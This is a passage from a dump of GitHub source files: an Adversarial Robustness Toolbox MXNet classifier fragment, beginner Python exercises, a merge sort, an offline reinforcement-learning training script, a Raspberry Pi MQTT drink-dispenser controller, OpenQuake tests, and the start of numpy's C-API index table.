`(nb_samples,)`.\n :param training_mode: `True` for model set to training mode and `'False` for model set to evaluation mode.\n :return: Array of gradients of the same shape as `x`.\n \"\"\"\n import mxnet as mx\n\n # Apply preprocessing\n x_preprocessed, y_preprocessed = self._apply_preprocessing(x, y, fit=False)\n y_preprocessed = mx.nd.array([np.argmax(y_preprocessed, axis=1)], ctx=self.ctx).T\n x_preprocessed = mx.nd.array(x_preprocessed.astype(config.ART_NUMPY_DTYPE), ctx=self.ctx)\n x_preprocessed.attach_grad()\n\n with mx.autograd.record(train_mode=training_mode):\n preds = self._model(x_preprocessed)\n loss = self.loss(preds, y_preprocessed)\n\n loss.backward()\n\n # Compute gradients\n grads = x_preprocessed.grad.asnumpy()\n grads = self._apply_preprocessing_gradient(x, grads)\n assert grads.shape == x.shape\n\n return grads\n\n def compute_loss(self, x: np.ndarray, y: np.ndarray, **kwargs) -> np.ndarray:\n \"\"\"\n Compute the loss of the neural network for samples `x`.\n\n :param x: Samples of shape (nb_samples, nb_features) or (nb_samples, nb_pixels_1, nb_pixels_2,\n nb_channels) or (nb_samples, nb_channels, nb_pixels_1, nb_pixels_2).\n :param y: Target values (class labels) one-hot-encoded of shape `(nb_samples, nb_classes)` or indices\n of shape `(nb_samples,)`.\n :return: Loss values.\n :rtype: Format as expected by the `model`\n \"\"\"\n raise NotImplementedError\n\n @property\n def layer_names(self) -> List[str]:\n \"\"\"\n Return the hidden layers in the model, if applicable.\n\n :return: The hidden layers in the model, input and output layers excluded.\n\n .. warning:: `layer_names` tries to infer the internal structure of the model.\n This feature comes with no guarantees on the correctness of the result.\n The intended order of the layers tries to match their order in the model, but this is not\n guaranteed either.\n \"\"\"\n return self._layer_names\n\n def get_activations(\n self, x: np.ndarray, layer: Union[int, str], batch_size: int = 128, framework: bool = False\n ) -> np.ndarray: # pragma: no cover\n \"\"\"\n Return the output of the specified layer for input `x`. `layer` is specified by layer index (between 0 and\n `nb_layers - 1`) or by name. The number of layers can be determined by counting the results returned by\n calling `layer_names`.\n\n :param x: Input for computing the activations.\n :param layer: Layer for computing the activations\n :param batch_size: Size of batches.\n :param framework: If true, return the intermediate tensor representation of the activation.\n :return: The output of `layer`, where the first dimension is the batch size corresponding to `x`.\n \"\"\"\n import mxnet as mx\n\n if isinstance(layer, six.string_types):\n if layer not in self._layer_names:\n raise ValueError(f\"Layer name {layer} is not part of the model.\")\n layer_ind = self._layer_names.index(layer)\n elif isinstance(layer, int):\n if layer < 0 or layer >= len(self._layer_names):\n raise ValueError(\n f\"Layer index {layer} is outside of range (0 to {len(self._layer_names) - 1} included).\"\n )\n layer_ind = layer\n else:\n raise TypeError(\"Layer must be of type `str` or `int`.\")\n\n # Apply preprocessing and defences\n if x.shape == self.input_shape:\n x_expanded = np.expand_dims(x, 0)\n else:\n x_expanded = x\n\n x_preprocessed, _ = self._apply_preprocessing(x=x_expanded, y=None, fit=False)\n\n if framework:\n return self._model[layer_ind]\n\n # Compute activations with batching\n activations = []\n nb_batches = int(np.ceil(len(x_preprocessed) / float(batch_size)))\n for batch_index in range(nb_batches):\n # Batch indexes\n begin, end = (\n batch_index * batch_size,\n min((batch_index + 1) * batch_size, x_preprocessed.shape[0]),\n )\n\n # Predict\n x_batch = mx.nd.array(x_preprocessed[begin:end].astype(config.ART_NUMPY_DTYPE), ctx=self.ctx)\n x_batch.attach_grad()\n with mx.autograd.record(train_mode=False):\n preds = self._model[layer_ind](x_batch)\n\n activations.append(preds.asnumpy())\n\n activations_array = np.vstack(activations)\n return activations_array\n\n def save(self, filename: str, path: Optional[str] = None) -> None:\n \"\"\"\n Save a model to file in the format specific to the backend framework. For Gluon, only parameters are saved in\n file with name `.params` at the specified path. To load the saved model, the original model code needs\n to be run before calling `load_parameters` on the generated Gluon model.\n\n :param filename: Name of the file where to store the model.\n :param path: Path of the folder where to store the model. If no path is specified, the model will be stored in\n the default data location of the library `ART_DATA_PATH`.\n \"\"\"\n if path is None:\n full_path = os.path.join(config.ART_DATA_PATH, filename)\n else:\n full_path = os.path.join(path, filename)\n folder = os.path.split(full_path)[0]\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n self._model.save_parameters(full_path + \".params\")\n logger.info(\"Model parameters saved in path: %s.params.\", full_path)\n\n def clone_for_refitting(self) -> \"MXClassifier\":\n \"\"\"\n Clone classifier for refitting.\n \"\"\"\n raise NotImplementedError\n\n def __repr__(self):\n repr_ = (\n f\"{self.__module__ + '.' + self.__class__.__name__}(model={self._model}, loss={self.loss},\"\n f\" input_shape={self.input_shape}, nb_classes={self.nb_classes}, optimizer={self.optimizer},\"\n f\" ctx={self.ctx}, channels_first={self.channels_first}, clip_values={self.clip_values!r},\"\n f\" preprocessing={self.preprocessing}, postprocessing_defences={self.postprocessing_defences},\"\n f\" preprocessing={self.preprocessing})\"\n )\n\n return repr_\n\n def _get_layers(self) -> list:\n \"\"\"\n Return the hidden layers in the model, if applicable.\n\n :return: The hidden layers in the model, input and output layers excluded.\n \"\"\"\n import mxnet\n\n if isinstance(self._model, mxnet.gluon.nn.Sequential):\n layer_names = [layer.name for layer in self._model[:-1]]\n logger.info(\"Inferred %i hidden layers on MXNet classifier.\", len(layer_names))\n else:\n layer_names = []\n\n return layer_names\n","repo_name":"Trusted-AI/adversarial-robustness-toolbox","sub_path":"art/estimators/classification/mxnet.py","file_name":"mxnet.py","file_ext":"py","file_size_in_byte":21871,"program_lang":"python","lang":"en","doc_type":"code","stars":4138,"dataset":"github-code","pt":"66"} +{"seq_id":"74052128529","text":"maior = 0\nmenor = 0\nfor p in range (1, 6):\n peso = int(input(f'Digite o peso da {p}° pessoa: '))\n if p == 1:\n maior = peso\n menor = peso\n else:\n if peso > maior:\n maior = peso\n if peso < menor:\n menor = peso\nprint(f'O maior peso lido foi de {maior}kg '\n f'\\ne o menor peso lido é de {menor}kg')","repo_name":"icarovnc/estudo-python","sub_path":"De 51 a 100/ex055.py","file_name":"ex055.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14799663448","text":"import numpy as np\n\nclass MergeSort:\n def __init__(self, data):\n self.data = data\n\n def sort(self):\n self.data = mergeSort(self.data)\n\ndef mergeSort(data):\n if len(data) > 1:\n mid = len(data)//2\n\n left = data[:mid]\n right = data[mid:]\n\n mergeSort(left)\n mergeSort(right)\n\n left_index = right_index = index = 0\n\n while left_index < len(left) and right_index < len(right):\n if left[left_index] <= right[right_index]:\n data[index] = left[left_index]\n left_index += 1\n else:\n data[index] = right[right_index]\n right_index += 1\n index +=1\n \n while left_index < len(left):\n data[index] = left[left_index]\n left_index += 1\n index += 1\n\n while right_index < len(right):\n data[index] = right[right_index]\n right_index += 1\n index += 1\n\n return data\n\n\n\nif __name__ == \"__main__\":\n data_random = np.random.randint(10, size=(10)).tolist()\n MS = MergeSort(data_random)\n MS.sort()","repo_name":"mrjrozycki/Sorting-Algorithms","sub_path":"mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10777559242","text":"import os\nimport time\n\nimport d4rl\nimport gym\nimport matplotlib.pyplot as plt \nimport numpy as np\nfrom PIL import Image \n\nimport torch\nfrom tqdm import tqdm\nimport wandb \n\nimport envs \nimport utils\nfrom smodice_pytorch import SMODICE\nfrom rce_pytorch import RCE_TD3_BC\nfrom oril_pytorch import ORIL \nfrom discriminator_pytorch import Discriminator_SA\n\nnp.set_printoptions(precision=3, suppress=True)\n\n\ndef run(config):\n # load offline dataset \n env = gym.make(f\"{config['env_name']}-mixed-v0\")\n dataset = env.get_dataset()\n\n # Load the custom kitchen environment that gets the success examples\n evaluation_env = gym.make(f\"{config['env_name']}-{config['dataset']}-v0\")\n expert_obs = evaluation_env.get_example(dataset, num_expert_obs=500)\n expert_traj = {'observations': expert_obs}\n \n np.random.seed(config['seed'])\n torch.manual_seed(config['seed'])\n env.seed(config['seed'])\n evaluation_env.seed(config['seed'])\n\n initial_obs_dataset, dataset, dataset_statistics = utils.dice_dataset(env, standardize_observation=config['standardize_obs'], absorbing_state=config['absorbing_state'], standardize_reward=config['standardize_reward'])\n\n # Normalize expert observations and potentially add absorbing state\n if config['standardize_obs']:\n expert_obs_dim = expert_traj['observations'].shape[1]\n expert_traj['observations'] = (expert_traj['observations'] - dataset_statistics['observation_mean'][:expert_obs_dim]) / (dataset_statistics['observation_std'][:expert_obs_dim] + 1e-10)\n if 'next_observations' in expert_traj:\n expert_traj['next_observations'] = (expert_traj['next_observations'] - dataset_statistics['observation_mean']) / (dataset_statistics['observation_std'] + 1e-10)\n if config['absorbing_state'] and 'terminal' in expert_traj:\n expert_traj = utils.add_absorbing_state(expert_traj)\n if config['use_policy_entropy_constraint'] or config['use_data_policy_entropy_constraint']:\n if config['target_entropy'] is None:\n config['target_entropy'] = -np.prod(env.action_space.shape)\n\n # Create inputs for the discriminator\n state_dim = dataset_statistics['observation_dim'] + 1 if config['absorbing_state'] else dataset_statistics['observation_dim']\n action_dim = 0 if config['state'] else dataset_statistics['action_dim']\n disc_cutoff = state_dim \n\n expert_input = expert_traj['observations'][:, :disc_cutoff]\n offline_input = dataset['observations'][:, :disc_cutoff]\n\n discriminator = Discriminator_SA(disc_cutoff, action_dim, hidden_dim=config['hidden_sizes'][0], device=config['device'])\n\n # Train discriminator\n if config['disc_type'] == 'learned':\n dataset_expert = torch.utils.data.TensorDataset(torch.FloatTensor(expert_input)) \n expert_loader = torch.utils.data.DataLoader(dataset_expert, batch_size=256, shuffle=True, pin_memory=True)\n dataset_offline = torch.utils.data.TensorDataset(torch.FloatTensor(offline_input))\n offline_loader = torch.utils.data.DataLoader(dataset_offline, batch_size=256, shuffle=True, pin_memory=True)\n\n # Train discriminator\n print(\"Train Discriminator\")\n for i in tqdm(range(config['disc_iterations'])):\n loss = discriminator.update(expert_loader, offline_loader)\n\n\n def _sample_minibatch(batch_size, reward_scale):\n initial_indices = np.random.randint(0, dataset_statistics['N_initial_observations'], batch_size)\n indices = np.random.randint(0, dataset_statistics['N'], batch_size)\n sampled_dataset = (\n initial_obs_dataset['initial_observations'][initial_indices],\n dataset['observations'][indices],\n dataset['actions'][indices],\n dataset['rewards'][indices] * reward_scale,\n dataset['next_observations'][indices],\n dataset['terminals'][indices]\n )\n return tuple(map(torch.from_numpy, sampled_dataset))\n\n def _evaluate(env, agent, dataset_statistics, absorbing_state=True, num_evaluation=10, normalize=False, make_gif=False, iteration=0, max_steps=None, run_name=''):\n normalized_scores = []\n if max_steps is None:\n max_steps = env._max_episode_steps\n imgs = []\n for eval_iter in range(num_evaluation):\n start_time = time.time()\n obs = env.reset()\n episode_reward = 0\n for t in tqdm(range(max_steps), ncols=70, desc='evaluate', ascii=True, disable=os.environ.get(\"DISABLE_TQDM\", False)):\n if absorbing_state:\n obs_standardized = np.append((obs - dataset_statistics['observation_mean']) / (dataset_statistics['observation_std'] + 1e-10), 0)\n else:\n obs_standardized = (obs - dataset_statistics['observation_mean']) / (dataset_statistics['observation_std'] + 1e-10)\n\n actions = agent.step((np.array([obs_standardized])).astype(np.float32))\n action = actions[0][0].numpy()\n \n # prevent NAN\n action = np.clip(action, env.action_space.low, env.action_space.high)\n next_obs, reward, done, info = env.step(action)\n \n # only care about the specified task\n if config['dataset'] in info['rewards']['removed']:\n reward = 1.0\n done = True\n else:\n reward = 0.0 \n done = False \n\n if make_gif and eval_iter == 0:\n img = env.render(mode=\"rgb_array\")\n imgs.append(Image.fromarray(img))\n episode_reward += reward\n if done:\n break\n obs = next_obs\n if normalize:\n normalized_score = 100 * (episode_reward - d4rl.infos.REF_MIN_SCORE[env.spec.id]) / (d4rl.infos.REF_MAX_SCORE[env.spec.id] - d4rl.infos.REF_MIN_SCORE[env.spec.id])\n else:\n normalized_score = episode_reward\n print(f'normalized_score: {normalized_score} (elapsed_time={time.time() - start_time:.3f}) ')\n normalized_scores.append(normalized_score)\n\n if make_gif:\n imgs = np.array(imgs)\n imgs[0].save(f\"policy_gifs/{run_name}-iter{iteration}.gif\", save_all=True,\n append_images=imgs[1:], duration=60, loop=0)\n return np.mean(normalized_scores)\n\n if 'dice' in config['algo_type']:\n agent = SMODICE(dataset_statistics['observation_dim'] + 1 if config['absorbing_state'] else dataset_statistics['observation_dim'],\n dataset_statistics['action_dim'], config=config\n )\n elif 'rce' in config['algo_type']:\n state_dim = dataset_statistics['observation_dim'] + 1 if config['absorbing_state'] else dataset_statistics['observation_dim']\n action_dim = dataset_statistics['action_dim']\n max_action = env.action_space.high[0]\n agent = RCE_TD3_BC(state_dim, action_dim, max_action)\n elif 'oril' in config['algo_type']:\n state_dim = dataset_statistics['observation_dim'] + 1 if config['absorbing_state'] else dataset_statistics['observation_dim']\n action_dim = dataset_statistics['action_dim']\n max_action = env.action_space.high[0]\n agent = ORIL(state_dim, action_dim, max_action)\n else:\n raise NotImplementedError\n\n result_logs = []\n start_iteration = 0\n\n # Start training\n start_time = time.time()\n last_start_time = time.time()\n for iteration in tqdm(range(start_iteration, config['total_iterations'] + 1), ncols=70, desc='DICE', initial=start_iteration, total=config['total_iterations'] + 1, ascii=True, disable=os.environ.get(\"DISABLE_TQDM\", False)):\n # Sample mini-batch data from dataset\n initial_observation, observation, action, reward, next_observation, terminal = _sample_minibatch(config['batch_size'], config['reward_scale'])\n\n # Sample success states for RCE\n if config['algo_type'] == 'rce':\n success_indices = np.random.randint(0, expert_traj['observations'].shape[0], config['batch_size'])\n success_state = torch.from_numpy(expert_traj['observations'][success_indices])\n initial_observation = success_state\n\n # Compute discriminator based reward (SMODICE, ORIL)\n with torch.no_grad():\n obs_for_disc = torch.from_numpy(np.array(observation)).to(discriminator.device)\n if config['state']:\n disc_input = obs_for_disc\n else:\n act_for_disc = torch.from_numpy(np.array(action)).to(discriminator.device)\n disc_input = torch.cat([obs_for_disc, act_for_disc], axis=1)\n reward = discriminator.predict_reward(disc_input)\n\n # Perform gradient descent\n train_result = agent.train_step(initial_observation, observation, action, reward, next_observation, terminal)\n \n # Evaluation\n if iteration % config['log_iterations'] == 0:\n train_result = {k: v.detach().cpu().numpy() for k, v in train_result.items()}\n # evaluation via real-env rollout\n eval = _evaluate(env, agent, dataset_statistics, absorbing_state=config['absorbing_state'],\n normalize=False, num_evaluation=10, max_steps=280)\n train_result.update({'iteration': iteration, 'eval': eval})\n\n train_result.update({'iter_per_sec': config['log_iterations'] / (time.time() - last_start_time)})\n if 'w_e' in train_result:\n train_result.update({'w_e': train_result['w_e'].mean()})\n result_logs.append({'log': train_result, 'step': iteration})\n if not int(os.environ.get('DISABLE_STDOUT', 0)):\n print(f'=======================================================')\n # for k, v in sorted(train_result.items()):\n # print(f'- {k:23s}:{v:15.10f}')\n if train_result.get('eval'):\n print(f'- {\"eval\":23s}:{train_result[\"eval\"]:15.10f}')\n print(f'iteration={iteration} (elapsed_time={time.time() - start_time:.2f}s, {train_result[\"iter_per_sec\"]:.2f}it/s)')\n print(f'=======================================================', flush=True)\n\n last_start_time = time.time()\n \n\nif __name__ == \"__main__\":\n from configs.oil_examples_kitchen_default import get_parser\n args = get_parser().parse_args()\n run(vars(args))","repo_name":"JasonMa2016/SMODICE","sub_path":"run_oil_examples_kitchen.py","file_name":"run_oil_examples_kitchen.py","file_ext":"py","file_size_in_byte":10528,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"66"} +{"seq_id":"70539364370","text":"import time\nimport RPi.GPIO as GPIO\nimport paho.mqtt.client as mqtt\nimport paho.mqtt.publish as publish\n\n# MQTT implemented - two soc's communicating\n# can control the water pump\n# ultrasonic sensor readings feeded to the website - not yet\n# pressure sensor readings feeded to the website - not yet\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\n# water pump\npin = 21\n\n# ultrasonic sensor\n#LED = 18\nTRIG = 23\nECHO = 24\n\n# ultrasonic sensor 2\nTRIG2 = 17\nECHO2 = 27\n\n# led indicators\nred = 6\nblue = 13\ngreen = 19\nyellow = 26\n\nGPIO.setup(yellow, GPIO.OUT, initial=GPIO.LOW)\nGPIO.setup(green, GPIO.OUT, initial=GPIO.LOW)\nGPIO.setup(blue, GPIO.OUT, initial=GPIO.LOW)\nGPIO.setup(red, GPIO.OUT, initial=GPIO.LOW)\nGPIO.setup(TRIG,GPIO.OUT)\nGPIO.setup(ECHO,GPIO.IN)\nGPIO.setup(TRIG2,GPIO.OUT)\nGPIO.setup(ECHO2,GPIO.IN)\nGPIO.setup(pin,GPIO.OUT)\n\nGPIO.output(pin, True)\nGPIO.output(yellow, GPIO.LOW)\nGPIO.output(green, GPIO.LOW)\nGPIO.output(blue, GPIO.LOW)\nGPIO.output(red, GPIO.LOW)\n\nrefreshTime = 0.2 #0.25\n\ndef turnOn(delay):\n GPIO.output(pin, False)\n print(\"pump on for \"+str(delay)+\" seconds\")\n GPIO.output(blue, GPIO.HIGH)\n time.sleep(delay)\n GPIO.output(pin, True)\n print(\"pump off\")\n GPIO.output(blue, GPIO.LOW)\n readLevel(3)\n \ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n readLevel(3)\n client.subscribe(\"pub/pump-1\")\n #checkCup(3)\n\ndef on_message(client, userdata, msg):\n #print(msg.topic+\" \"+str(msg.payload))\n txt = str(msg.payload)\n msgText = txt.split(\"'\")\n #print(msgText[1])\n\n # drink sizes\n if msgText[1] == \"s\":\n print(\"Received order : small drink\")\n if(checkLevel(3) == True):\n if(checkCup(3) == \"CORRECT\"):\n turnOn(1)\n else:\n print(\"Cup not placed correctly\")\n else:\n print(\"Error : tank empty\")\n elif msgText[1] == \"m\":\n print(\"Received order : medium drink\")\n if(checkLevel(3) == True):\n if(checkCup(3) == \"CORRECT\"):\n turnOn(1.8)\n else:\n print(\"Cup not placed correctly\")\n else:\n print(\"Error : tank empty\")\n elif msgText[1] == \"l\":\n print(\"Received order : large drink\")\n if(checkLevel(3) == True):\n if(checkCup(3) == \"CORRECT\"):\n turnOn(2.6)\n else:\n print(\"Cup not placed correctly\")\n else:\n print(\"Error : tank empty\")\n elif msgText[1] == \"readLevel\":\n print(\"Checking levels\")\n readLevel(2)\n\ndef checkLevel(delay):\n if(readLevel(delay) != \"EMPTY\"):\n return True\n else:\n return False\n #return True\n\ndef readLevel(delay):\n i = 0\n while i < delay:\n GPIO.output(TRIG, False)\n time.sleep(refreshTime)\n GPIO.output(TRIG, True)\n time.sleep(0.00001)\n GPIO.output(TRIG, False)\n\n while GPIO.input(ECHO)==0:\n pulse_start = time.time()\n\n while GPIO.input(ECHO)==1:\n pulse_end = time.time()\n\n pulse_duration = pulse_end - pulse_start\n distance = pulse_duration * 17150\n distance = round(distance, 1)\n print(distance)\n\n i += 1\n\n if(distance >= 1 and distance < 3.5):\n print(\"Drinks capacity : HIGH\")\n publish.single(\"pub/tank-1\", \"HIGH\", hostname=\"broker.emqx.io\")\n GPIO.output(green, GPIO.HIGH)\n GPIO.output(yellow, GPIO.LOW)\n return \"HIGH\"\n elif(distance > 3.4 and distance < 4.2):\n print(\"Drinks capacity : MID\")\n publish.single(\"pub/tank-1\", \"MID\", hostname=\"broker.emqx.io\")\n GPIO.output(green, GPIO.HIGH)\n GPIO.output(yellow, GPIO.LOW)\n return \"MID\"\n elif(distance >= 4.2 and distance < 4.8):\n print(\"Drinks capacity : LOW\")\n publish.single(\"pub/tank-1\", \"LOW\", hostname=\"broker.emqx.io\")\n GPIO.output(green, GPIO.LOW)\n GPIO.output(yellow, GPIO.HIGH)\n return \"LOW\"\n elif(distance >= 4.8 and distance < 7):\n print(\"Drinks capacity : EMPTY\")\n publish.single(\"pub/tank-1\", \"EMPTY\", hostname=\"broker.emqx.io\")\n GPIO.output(green, GPIO.LOW)\n GPIO.output(yellow, GPIO.HIGH)\n return \"EMPTY\"\n \ndef checkCup(delay):\n i = 0\n while i < delay:\n GPIO.output(TRIG2, False)\n time.sleep(refreshTime)\n GPIO.output(TRIG2, True)\n time.sleep(0.00001)\n GPIO.output(TRIG2, False)\n\n while GPIO.input(ECHO2)==0:\n pulse_start = time.time()\n\n while GPIO.input(ECHO2)==1:\n pulse_end = time.time()\n\n pulse_duration = pulse_end - pulse_start\n distance = pulse_duration * 17150\n distance = round(distance, 1)\n #print(distance)\n\n i += 1\n\n if(distance >= 3.3 and distance <= 6):\n print(\"Cup placement : CORRECT\")\n #publish.single(\"pub/tank-1\", \"HIGH\", hostname=\"broker.emqx.io\")\n GPIO.output(red, GPIO.LOW)\n return \"CORRECT\"\n else:\n print(\"Cup placement : INCORRECT\")\n #publish.single(\"pub/tank-1\", \"HIGH\", hostname=\"broker.emqx.io\")\n GPIO.output(red, GPIO.HIGH)\n return \"INCORRECT\"\n\n# Create an MQTT client and attach our routines to it.\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.connect(\"broker.emqx.io\", 1883, 60)\nclient.loop_forever()\n\nGPIO.cleanup()\n","repo_name":"denxwan/SIT210-ProjectFiles","sub_path":"smartDrinksDispenser/smartDrinksDispenser.py","file_name":"smartDrinksDispenser.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10839372890","text":"\nimport unittest\n\nfrom openquake.man.single.areas import _get_area, get_rates_density\n\nfrom shapely.wkt import loads\n\nfrom openquake.hazardlib.source import AreaSource\nfrom openquake.hazardlib.mfd import TruncatedGRMFD\nfrom openquake.hazardlib.scalerel.wc1994 import WC1994\nfrom openquake.hazardlib.tom import PoissonTOM\nfrom openquake.hazardlib.geo import Point, Polygon\nfrom openquake.hazardlib.geo.nodalplane import NodalPlane\nfrom openquake.hazardlib.pmf import PMF\n\n\nclass TestGetArea(unittest.TestCase):\n\n def setUp(self):\n self.pol = Polygon([Point(longitude=0.0, latitude=0.0),\n Point(longitude=1.0, latitude=0.0),\n Point(longitude=1.0, latitude=1.0),\n Point(longitude=0.0, latitude=1.0)])\n\n def test01(self):\n # Initial approximated value obtained by roughly multiplying the lenght\n # of one degree of longitude time one degree of latitude\n expected = 12308.236750903827\n computed = _get_area(loads(self.pol.wkt))\n self.assertEqual(expected, computed)\n\n\nclass TestAreaSourceDensity(unittest.TestCase):\n\n def setUp(self):\n\n mfd = TruncatedGRMFD(min_mag=4.0, max_mag=6.0, bin_width=0.1,\n a_val=2.0, b_val=1.0)\n msr = WC1994()\n tom = PoissonTOM(1.0)\n pol = Polygon([Point(longitude=0.0, latitude=0.0),\n Point(longitude=1.0, latitude=0.0),\n Point(longitude=1.0, latitude=1.0),\n Point(longitude=0.0, latitude=1.0)])\n npd = PMF([(1.0, NodalPlane(0.0, 90.0, 0.0))])\n hpd = PMF([(0.7, 10.), (0.3, 20.0)])\n\n self.src1 = AreaSource(source_id='1',\n name='1',\n tectonic_region_type='Test',\n mfd=mfd,\n rupture_mesh_spacing=1,\n magnitude_scaling_relationship=msr,\n rupture_aspect_ratio=1.,\n temporal_occurrence_model=tom,\n upper_seismogenic_depth=0,\n lower_seismogenic_depth=100.,\n nodal_plane_distribution=npd,\n hypocenter_distribution=hpd,\n polygon=pol,\n area_discretization=10.)\n\n def test01(self):\n # Initial value obtained by dividing the rate by the area\n # 10**(a-bmt)-10**(a-bmu) / area\n expected = 1.7567728862622177e-08\n computed = get_rates_density([self.src1], mmint=5.5)\n self.assertEqual(expected, computed['1'])\n","repo_name":"GEMScienceTools/oq-man","sub_path":"openquake/man/tests/single/area_test.py","file_name":"area_test.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23836177758","text":"materias = ['Matematica', 'Física', 'Educación fisica', 'Arte', 'Historia']\nn = 0\n\nwhile n<5:\n print( materias[n])\n nota = int(input('Ingrese la nota: '))\n if nota < 6:\n print('Desaprobado')\n else:\n print('Aprobado')\n n = n + 1\n print('')","repo_name":"Malco90/Clases-Python","sub_path":"notas.py","file_name":"notas.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"43481497999","text":"\"\"\"Here we define the exported functions, types, etc... which need to be\nexported through a global C pointer.\n\nEach dictionary contains name -> index pair.\n\nWhenever you change one index, you break the ABI (and the ABI version number\nshould be incremented). Whenever you add an item to one of the dict, the API\nneeds to be updated in both numpy/core/meson.build and by adding an appropriate\nentry to cversion.txt (generate the hash via \"python cversions.py\").\n\nWhen adding a function, make sure to use the next integer not used as an index\n(in case you use an existing index or jump, the build will stop and raise an\nexception, so it should hopefully not get unnoticed).\n\n\"\"\"\n\nimport os\nimport importlib.util\n\n\ndef get_annotations():\n # Convoluted because we can't import from numpy.distutils\n # (numpy is not yet built)\n genapi_py = os.path.join(os.path.dirname(__file__), 'genapi.py')\n spec = importlib.util.spec_from_file_location('conv_template', genapi_py)\n mod = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(mod)\n return mod.StealRef, mod.MinVersion\n\n\nStealRef, MinVersion = get_annotations()\n#from code_generators.genapi import StealRef\n\n# index, type\nmultiarray_global_vars = {\n 'NPY_NUMUSERTYPES': (7, 'int'),\n 'NPY_DEFAULT_ASSIGN_CASTING': (292, 'NPY_CASTING'),\n 'PyDataMem_DefaultHandler': (306, 'PyObject*'),\n}\n\nmultiarray_scalar_bool_values = {\n '_PyArrayScalar_BoolValues': (9,)\n}\n\n# index, annotations\n# please mark functions that have been checked to not need any annotations\nmultiarray_types_api = {\n 'PyBigArray_Type': (1,),\n 'PyArray_Type': (2,),\n # Internally, PyArrayDescr_Type is a PyArray_DTypeMeta,\n # the following also defines PyArrayDescr_TypeFull (Full appended)\n 'PyArrayDescr_Type': (3, \"PyArray_DTypeMeta\"),\n 'PyArrayFlags_Type': (4,),\n 'PyArrayIter_Type': (5,),\n 'PyArrayMultiIter_Type': (6,),\n 'PyBoolArrType_Type': (8,),\n 'PyGenericArrType_Type': (10,),\n 'PyNumberArrType_Type': (11,),\n 'PyIntegerArrType_Type': (12,),\n 'PySignedIntegerArrType_Type': (13,),\n 'PyUnsignedIntegerArrType_Type': (14,),\n 'PyInexactArrType_Type': (15,),\n 'PyFloatingArrType_Type': (16,),\n 'PyComplexFloatingArrType_Type': (17,),\n 'PyFlexibleArrType_Type': (18,),\n 'PyCharacterArrType_Type': (19,),\n 'PyByteArrType_Type': (20,),\n 'PyShortArrType_Type': (21,),\n 'PyIntArrType_Type': (22,),\n 'PyLongArrType_Type': (23,),\n 'PyLongLongArrType_Type': (24,),\n 'PyUByteArrType_Type': (25,),\n 'PyUShortArrType_Type': (26,),\n 'PyUIntArrType_Type': (27,),\n 'PyULongArrType_Type': (28,),\n 'PyULongLongArrType_Type': (29,),\n 'PyFloatArrType_Type': (30,),\n 'PyDoubleArrType_Type': (31,),\n 'PyLongDoubleArrType_Type': (32,),\n 'PyCFloatArrType_Type': (33,),\n 'PyCDoubleArrType_Type': (34,),\n 'PyCLongDoubleArrType_Type': (35,),\n 'PyObjectArrType_Type': (36,),\n 'PyStringArrType_Type': (37,),\n 'PyUnicodeArrType_Type': (38,),\n 'PyVoidArrType_Type': (39,),\n # End 1.5 API\n 'PyTimeIntegerArrType_Type': (214,),\n 'PyDatetimeArrType_Type': (215,),\n 'PyTimedeltaArrType_Type': (216,),\n 'PyHalfArrType_Type': (217,),\n 'NpyIter_Type': (218,),\n # End 1.6 API\n}\n\n# define NPY_NUMUSERTYPES (*(int *)PyArray_API[6])\n# define PyBoolArrType_Type (*(PyTypeObject *)PyArray_API[7])\n# define _PyArrayScalar_BoolValues ((PyBoolScalarObject *)PyArray_API[8])\n\nmultiarray_funcs_api = {\n '__unused_indices__': [\n 40, 41, 65, 67, 68, 163, 164, 171, 201, 202, 278, 291],\n 'PyArray_GetNDArrayCVersion': (0,),\n # Unused slot 40, was `PyArray_SetNumericOps`\n # Unused slot 41, was `PyArray_GetNumericOps`,\n 'PyArray_INCREF': (42,),\n 'PyArray_XDECREF': (43,),\n 'PyArray_SetStringFunction': (44,),\n 'PyArray_DescrFromType': (45,),\n 'PyArray_TypeObjectFromType': (46,),\n 'PyArray_Zero': (47,),\n 'PyArray_One': (48,),\n 'PyArray_CastToType': (49, StealRef(2)),\n 'PyArray_CastTo': (50,),\n 'PyArray_CastAnyTo': (51,),\n 'PyArray_CanCastSafely': (52,),\n 'PyArray_CanCastTo': (53,),\n 'PyArray_ObjectType': (54,),\n 'PyArray_DescrFromObject': (55,),\n 'PyArray_ConvertToCommonType': (56,),\n 'PyArray_DescrFromScalar': (57,),\n 'PyArray_DescrFromTypeObject': (58,),\n 'PyArray_Size': (59,),\n 'PyArray_Scalar': (60,),\n 'PyArray_FromScalar': (61, StealRef(2)),\n 'PyArray_ScalarAsCtype': (62,),\n 'PyArray_CastScalarToCtype': (63,),\n 'PyArray_CastScalarDirect': (64,),\n # Unused slot 65, was `PyArray_ScalarFromObject`\n 'PyArray_GetCastFunc': (66,),\n # Unused slot 67, was `PyArray_FromDims`\n # Unused slot 68, was `PyArray_FromDimsAndDataAndDescr`\n 'PyArray_FromAny': (69, StealRef(2)),\n 'PyArray_EnsureArray': (70, StealRef(1)),\n 'PyArray_EnsureAnyArray': (71, StealRef(1)),\n 'PyArray_FromFile': (72,),\n 'PyArray_FromString': (73,),\n 'PyArray_FromBuffer': (74,),\n 'PyArray_FromIter': (75, StealRef(2)),\n 'PyArray_Return': (76, StealRef(1)),\n 'PyArray_GetField': (77, StealRef(2)),\n 'PyArray_SetField': (78, StealRef(2)),\n 'PyArray_Byteswap': (79,),\n 'PyArray_Resize': 